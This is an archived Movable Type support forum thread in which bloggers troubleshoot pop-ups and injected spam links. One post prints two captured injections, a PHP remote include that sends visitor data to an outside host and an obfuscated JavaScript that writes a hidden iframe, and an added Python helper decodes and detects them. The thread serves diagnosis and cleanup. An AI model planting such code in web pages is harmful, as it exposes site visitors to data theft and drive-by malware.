At long last, we're moving to forums powered by, well, Movable Type itself. You'll want to bookmark http://forums.movabletype.org/ for future reference, and in the meantime you can view these old forums as a read-only archive of past posts. Thanks for being part of the community!
Nov 30 2005, 08:00 AM, Post #1
Group: Members Posts: 19 Joined: 4-March 04 From: rs/brasil Member No.: 21,879
Some weeks ago pop-ups (pop-unders, actually) started to come out of our blogs (URL: www.verbeat.org/blogs). Our ISP informed us that it was a flaw in MT, that someone hacked us using SQL injection (?) and that we should upgrade it to the latest version - but we're *already* running 3.2.
Any ideas? Does it happen to anybody else? Any tips on how to remove it? (It appears to be calling a script.) Our system seems to be working fine, though. URL: www.verbeat.org/mt.htm. We're using Linux and a MySQL database. Thanks, tiago
Dec 1 2005, 03:51 PM, Post #2
Technical Services Group: Six Apart Moderators Posts: 1,088 Joined: 30-October 05 Member No.: 33,516
Did your webhost explain to you the nature of this alleged flaw in Movable Type? Did the hacker gain access to your Movable Type templates (I'm assuming this is how they added any code to call the pop-unders?) via your installation (i.e., by obtaining your login details), or did they perhaps access your MySQL database directly, or the published files on the server?
If you want to remove any code you don't want, you would need to edit your templates to remove this. Or, if your host has a backup of your database from prior to the hack, you could ask that they restore this for you, and then rebuild your site.
Dec 2 2005, 05:32 PM, Post #3
Group: Members Posts: 689 Joined: 7-April 03 From: SF Bay Area ... usually Member No.: 9,603
Are you using the "link to file" feature for your templates? If so, you are saving copies of your templates outside the database. Something similar happened to me a year ago, and the problem was that since I didn't turn on the CGIwrap SuExec in the mt config file, my files outside the database were more vulnerable to attack. If you have saved a template to file, and someone makes changes to those files, then when you rebuild your site, the amended file will be saved into the DB. Thousands of pages on my blog were corrupted this way. See my write-up here: attacked.
Dec 6 2005, 06:03 AM, Post #4
Group: Members Posts: 19 Joined: 4-March 04 From: rs/brasil Member No.: 21,879
Hi, and thanks for the help.
But no, I'm not using the "link to file" feature. And the webhost told us the MySQL database was attacked directly. He also directed me to this page: http://search.securityfocus.com/swsearch?s...e-Type&x=24&y=6. From what I have read, all of them were fixed in newer versions of MT... I have double-checked my templates for any strange code, but there is nothing there either :-/ To make things worse, we were not able to find out when the pop-ups started appearing, and with 20 blogs running, a database backup would be chaos... Gonna read your info now, Elise, and see if I can find something else. Thanks again, tiago
Dec 7 2005, 11:06 AM, Post #5
Technical Services Manager Group: Six Apart Posts: 17,550 Joined: 8-November 01 From: Texas Member No.: 22,617
Your host seems to be saying contradictory things - first, that this was a flaw in Movable Type, and then that the MySQL database was attacked directly.
And then there's the third possibility as suggested by Elise: that someone gained access to the server and modified the actual blog files (assuming you're using static publishing). The last one actually seems to be the more likely option, since you can't find any odd code in the templates.
Dec 8 2005, 03:58 AM, Post #6
Group: Members Posts: 19 Joined: 4-March 04 From: rs/brasil Member No.: 21,879
Shelley, even though I'm using one of the biggest webhosts here in Brazil, I can imagine they don't really know what they're talking about. I mean, it's so easy to say "the problem is the software - upgrade it - we're washing our hands".
And yes, I'm using static publishing. No PHP here. Do you think a new upload of the MT files would be worth a shot?
Dec 8 2005, 08:30 AM, Post #7
Technical Services Manager Group: Six Apart Posts: 17,550 Joined: 8-November 01 From: Texas Member No.: 22,617
I'm not saying they don't know what they're talking about, only that they've not been clear about what they think really happened here. We can't determine whether or not the problem is in Movable Type without actual information that suggests it is. And it's just that I've lost count of the number of times a conversation has started with "My host said Movable Type has a security hole" and ended with "Oops, they say now it wasn't Movable Type; someone hacked the server."
"The MySQL database was attacked directly" but "the problem is in the software". Those two things contradict each other - if the database was attacked directly, how was Movable Type the problem? - which is what is confusing here. There aren't any currently known vulnerabilities in Movable Type which would allow an *outsider* to inject malicious code into your files. Insiders (i.e., authors) can put JavaScript, PHP, etc. into their entries or templates; but it's kind of hard to disallow those things when users want to be able to customize their code. If you can't see any of this bad code in the Template(s) in the Movable Type interface or in the column for the template code in the MySQL database table, then that would leave the files on the server to be the culprit. You could try a Rebuild Site to see if Movable Type can overwrite them all.
Do you see the popups when using Movable Type, or only when visiting the weblog pages? Uploading the Movable Type files again would only work if the hacker modified some of the original files.
Dec 9 2005, 05:32 AM, Post #8
Group: Members Posts: 19 Joined: 4-March 04 From: rs/brasil Member No.: 21,879
Shelley, thanks for all your patience and info.
Yes, the pop-ups only appear when viewing the blog pages - not when using the system. And it's only some of our blogs, not all of them. I'm gonna check the tables in the SQL database once more - a friend has done it and found nothing. Gonna try the rebuild, too. And if it doesn't solve the problem, I will upload the MT files again. (crossing fingers)
Dec 19 2005, 10:32 AM, Post #9
Group: Members Posts: 3 Joined: 19-December 05 Member No.: 34,018
I have been having a similar issue. I am getting random links injected into my pages along with some JavaScript.
They're being injected directly into the HTML pages - not even the templates. Any tips? :/ I have a LOT of content on my blog; it's going to be a real pity to just ditch it, but almost all of the pages that are archived seem to have it even though there is nothing in the archive templates. It's just directly in the page that is created :/ Thanks in advance, Shane
Dec 19 2005, 11:47 AM, Post #10
Group: Members Posts: 2,543 Joined: 16-October 03 Member No.: 16,767
QUOTE (Shanep @ Dec 19 2005, 01:32 PM)
I have been having a similar issue. I am getting random links injected into my pages along with some JavaScript. They're being injected directly into the HTML pages - not even the templates. Any tips? :/ I have a LOT of content on my blog; it's going to be a real pity to just ditch it, but almost all of the pages that are archived seem to have it even though there is nothing in the archive templates. It's just directly in the page that is created :/ Thanks in advance, Shane
If your blog content and templates all look OK, there's really nothing that can be done from MT's side of things. Sounds like something you'll need to take up with your host provider. Either they're using their webserver to send additional content to the browser, or they have some security issues that are allowing someone to sneak in extra crap.
Dec 19 2005, 02:39 PM, Post #11
Group: Members Posts: 3 Joined: 19-December 05 Member No.: 34,018
Thanks for the reply.
Yeah, I'm a little confused. In *EVERY* single archived page there is some arbitrary link. A couple of months back I was finding a few lines of JavaScript in the files as well. The code was somehow obfuscated/encrypted, so I'm not exactly sure what it was doing. All I know is it wasn't supposed to be there. My problem here mainly is that some of these links are trying to install trojans - which probably now explains what the JavaScript is doing. It only seems to affect IE. The good news is it doesn't seem to be in any of my templates, so hopefully I can figure out an easy way to wipe out all archives and rebuild. Thanks again for the reply.
Dec 22 2005, 05:31 AM, Post #12
Group: Members Posts: 19 Joined: 4-March 04 From: rs/brasil Member No.: 21,879
In our case, the pop-ups appear with Firefox too. And I've never seen any strange code in our templates...
I've rebuilt it all (twice) and things didn't change. I'm trying to get something from my ISP now.
Mar 15 2006, 09:47 AM, Post #13
Group: Members Posts: 19 Joined: 4-March 04 From: rs/brasil Member No.: 21,879
Problem fixed
I'm feeling real stupid. But what was generating the pop-ups was the NEDSTAT Counter. As we have 20+ blogs, and the counter was installed only on some of them, we thought the problem was a random issue. It wasn't. And our ISP doesn't help us at all by telling us that it was a security flaw in MT (obviously just trying to push the problem forward). We just found by accident that NEDSTAT was causing that. Also, the counter - free - didn't show pop-ups until some time ago. In the beginning, it was a clean service. Then they changed their page, saying the service would be nicer and smarter and etc. - and started with the pop-ups. I received some notifications from the company, but none of them talked about this, of course. I apologize to all those who took the time to help. Now I'm gonna spread the word about them. And I ain't gonna say pretty things. Anyway, hope this can help other people too. Thanks again, Tiago
Apr 16 2006, 07:19 PM, Post #14
Group: Members Posts: 19 Joined: 9-March 03 Member No.: 5,448
QUOTE (Shanep @ Dec 19 2005, 07:32 PM)
I have been having a similar issue. I am getting random links injected into my pages along with some JavaScript. They're being injected directly into the HTML pages - not even the templates. Any tips? :/ I have a LOT of content on my blog; it's going to be a real pity to just ditch it, but almost all of the pages that are archived seem to have it even though there is nothing in the archive templates. It's just directly in the page that is created :/ Thanks in advance, Shane
In my case, which occurred yesterday, the templates themselves were the recipients of the unwanted injections. There were links to spam sites, and an obfuscated JavaScript which attempted to load a WMF to the reader. I believe the latter was an attempted browser hijack, though I could be wrong. Fortunately, the template munging affected the layout of my site, so I was immediately able to see there was a problem. Had that not been the case, I hate to think how long it might have gone before I caught it. I looked through my site logs - there was no evidence of a brute-force attack on my admin login, and my webhost saw no evidence of the server having been cracked. I saved some examples of the injected code. I found the following preceding the DTD in some of the templates:
CODE
<?xml version="1.0" encoding="iso-8859-1"error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>
I don't know what it means, but it looks evil. I also found scripts like the following at the bottom of other templates:
CODE
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#v furoolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<= k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h); </script>
Ditto the "evil" remark above. Interestingly (?) in each affected template, it was one or the other of the injections, but not both, though there were static spam links in the templates which had been hit with the second code snippet.
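An added analysis helper for the two injections posted above (example code written for this archive, not from the thread's author or from Movable Type): it reverses the `charCodeAt(...)-3` shift used by the second snippet to show what `document.write` actually puts into the page, and flags in published HTML the indicators the two snippets carry (the shift-decoding loader, the `include_once(base64_decode(...))` remote include, and a hidden 1x1 iframe). The sample page is constructed; the obfuscated literal is the one posted above with one stray space, assumed to be a forum line-wrap artifact, removed.

```python
import re

# Obfuscated literal as posted in the thread above. One stray space inside
# "v furoolqj" is assumed to be a forum line-wrap artifact and was removed.
OBFUSCATED = ("?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A"
              "?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3"
              "#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3"
              "#vfuroolqj@qrA?2liudphA?2glyA")

# Constructed sample of a published archive page carrying the loader.
SAMPLE_PAGE = ('<html><body><p>entry text</p>\n'
               '<script language="javascript" type="text/javascript">var k=\''
               + OBFUSCATED + '\',t=0,h=\'\';while(t<= k.length-1){h=h+String.'
               'fromCharCode(k.charCodeAt(t++)-3);}document.write(h); </script>\n'
               '</body></html>')

def decode_shift(payload, shift=3):
    """Undo the loader's loop: every stored char is the real char plus `shift`."""
    return "".join(chr(ord(c) - shift) for c in payload)

def recover_shift_payload(html):
    """Find a document.write(String.fromCharCode(... - N)) loader and decode it."""
    lit = re.search(r"var k='([^']*)'", html)
    shift = re.search(r"charCodeAt\(t\+\+\)\s*-\s*(\d+)", html)
    if not (lit and shift):
        return None
    return decode_shift(lit.group(1), int(shift.group(1)))

INDICATORS = [
    ("shift-encoded document.write",
     re.compile(r"String\.fromCharCode\([^)]*charCodeAt\([^)]*\)\s*-\s*\d+")),
    ("remote include via base64_decode",
     re.compile(r"include_once\(\s*base64_decode\(")),
    ("hidden 1x1 iframe",
     re.compile(r"visibility:\s*hidden.*?<iframe|<iframe[^>]*\b(width|height)=1\b", re.S)),
]

def triage_html(html):
    """Flag injection indicators in a page; a decoded loader is scanned as well."""
    decoded = recover_shift_payload(html)
    texts = [html] + ([decoded] if decoded else [])
    findings = {name: True for name, rx in INDICATORS
                if any(rx.search(t) for t in texts)}
    if decoded:
        findings["decoded_loader"] = decoded
    return findings

if __name__ == "__main__":
    for name, value in triage_html(SAMPLE_PAGE).items():
        print(name, "->", value)
```

Run over a tree of published pages, the decoded loader reveals a hidden, absolutely positioned 1x1 iframe pulling a third-party URL, which is what made the "load a WMF to the reader" observation above possible.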
Apr 16 2006, 07:27 PM, Post #15
Group: Members Posts: 19 Joined: 9-March 03 Member No.: 5,448
In addition to the previous...
I'm on 3.14, though my 3.2 upgrade plans have now been advanced to "as soon as possible." Also, I notice that when I publish or republish a post, the main index now does not rebuild. How it's related, I don't know - but I do not believe in coincidences... not like this.
Apr 17 2006, 09:31 AM, Post #16
Technical Services Group: Six Apart Moderators Posts: 2,480 Joined: 30-October 05 From: Woburn, MA Member No.: 33,515
I think this information will help you tighten up your permissions... Also, you said that you cannot rebuild your site? Do you get errors?
There are two articles on Learning Movable Type that will explain how Elise tightened down her permissions after she had trouble with hackers: http://www.learningmovabletype.com/announc...822attacked.php http://www.learningmovabletype.com/announc...to_attacked.php She also has an article about setting the Umask directives: http://www.learningmovabletype.com/archive..._and_suexec.php